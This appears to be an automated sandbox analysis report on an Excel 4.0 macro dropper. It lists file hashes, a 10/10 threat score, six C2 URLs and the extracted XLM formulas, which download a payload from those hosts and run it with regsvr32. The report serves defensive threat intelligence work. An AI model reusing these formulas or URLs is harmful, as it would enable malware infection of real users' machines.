General

  • Target

    47978e3b3e8d63fba4bd1e2852344f41def23c2cc15f9603ca9b4b4b1ec0a805

  • Size

    40KB

  • Sample

    241119-wn4lyazaje

  • MD5

    d6b94c5cce0556b555e78e6aaa50ef62

  • SHA1

    159d6f386302cf0d20c9fe1b28048ecd51797b9e

  • SHA256

    47978e3b3e8d63fba4bd1e2852344f41def23c2cc15f9603ca9b4b4b1ec0a805

  • SHA512

    e253e629375d38528b6d6b9777c5e58805f66156fceb1eab0a7cac59580d7c9df19ffccda3f5b4508f4cd3478a0338906f0cefbe4515256e510b2b3f706b4281

  • SSDEEP

    768:WbomCS/DOevZCwt7OyKfcrND59V+L9Rw4eWrXcTqZ0VfddDhw:eomd/DmylND59V4jwmXc2CVfdxi

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://linkmys.com/stats/nnF/

https://livejagat.com/h/UDwLU4FTwf/

https://ticsnp.azurewebsites.net/anko-agust/treN2T/

https://paintingsouq.com/l93mxsk/Ich7kJF7n3Fu5v/

https://sanvicente.group/wp-content/dBsh5232WHIsiwyQAln/

https://novinex.net/wp-admin/p9FV5/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://linkmys.com/stats/nnF/","..\dxw.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://livejagat.com/h/UDwLU4FTwf/","..\dxw.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ticsnp.azurewebsites.net/anko-agust/treN2T/","..\dxw.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://paintingsouq.com/l93mxsk/Ich7kJF7n3Fu5v/","..\dxw.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sanvicente.group/wp-content/dBsh5232WHIsiwyQAln/","..\dxw.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://novinex.net/wp-admin/p9FV5/","..\dxw.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dxw.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://linkmys.com/stats/nnF/

xlm40.dropper

https://livejagat.com/h/UDwLU4FTwf/

xlm40.dropper

https://ticsnp.azurewebsites.net/anko-agust/treN2T/

xlm40.dropper

https://paintingsouq.com/l93mxsk/Ich7kJF7n3Fu5v/

xlm40.dropper

https://sanvicente.group/wp-content/dBsh5232WHIsiwyQAln/

xlm40.dropper

https://novinex.net/wp-admin/p9FV5/

Targets

    • Target

      47978e3b3e8d63fba4bd1e2852344f41def23c2cc15f9603ca9b4b4b1ec0a805

    • Size

      40KB

    • MD5

      d6b94c5cce0556b555e78e6aaa50ef62

    • SHA1

      159d6f386302cf0d20c9fe1b28048ecd51797b9e

    • SHA256

      47978e3b3e8d63fba4bd1e2852344f41def23c2cc15f9603ca9b4b4b1ec0a805

    • SHA512

      e253e629375d38528b6d6b9777c5e58805f66156fceb1eab0a7cac59580d7c9df19ffccda3f5b4508f4cd3478a0338906f0cefbe4515256e510b2b3f706b4281

    • SSDEEP

      768:WbomCS/DOevZCwt7OyKfcrND59V+L9Rw4eWrXcTqZ0VfddDhw:eomd/DmylND59V4jwmXc2CVfdxi

    Score
    10/10

MITRE ATT&CK Enterprise v15

Tasks